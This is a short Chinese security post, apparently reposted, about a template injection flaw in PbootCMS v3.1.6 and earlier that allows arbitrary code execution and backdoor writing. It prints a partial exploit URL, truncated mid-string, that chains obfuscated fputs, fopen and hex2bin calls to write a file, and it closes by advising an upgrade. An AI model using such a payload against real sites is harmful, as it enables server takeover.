本文共 670 字,大约阅读时间需要 2 分钟。
PbootCMS 是一款全新内核且永久开源免费的 PHP 企业网站开发管理系统。这套高效简洁的 CMS 源码设计为各类企业网站开发提供了强大支持,能够满足多样化的建设需求。
在 PbootCMS v<=3.1.6 版本中,存在严重的模板注入漏洞。攻击者可通过构造特定链接,利用此漏洞执行任意代码,甚至写入后门,从而获取服务器权限,最终控制整个 web 服务器。
攻击者可以通过以下环境进行漏洞复现:
通过模板注入漏洞,攻击者可以构造如下 URL:
/?member/login/aaaaaa}{pboot:if(true);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/test1;use/**/function/**/get/**/as/**/test3;use/**/function/**/hex2bin/**/as/**/test4;test(test1(test3('file'),'w'),test4(t 此代码片段展示了攻击者如何利用模板注入漏洞,执行任意操作,包括文件读写和信息获取。
PbootCMS v<=3.1.6 版本的模板注入漏洞存在严重安全隐患,建议及时升级至安全版本,并采取相应的安全措施以防范潜在攻击。
转载地址:http://xavfk.baihongyu.com/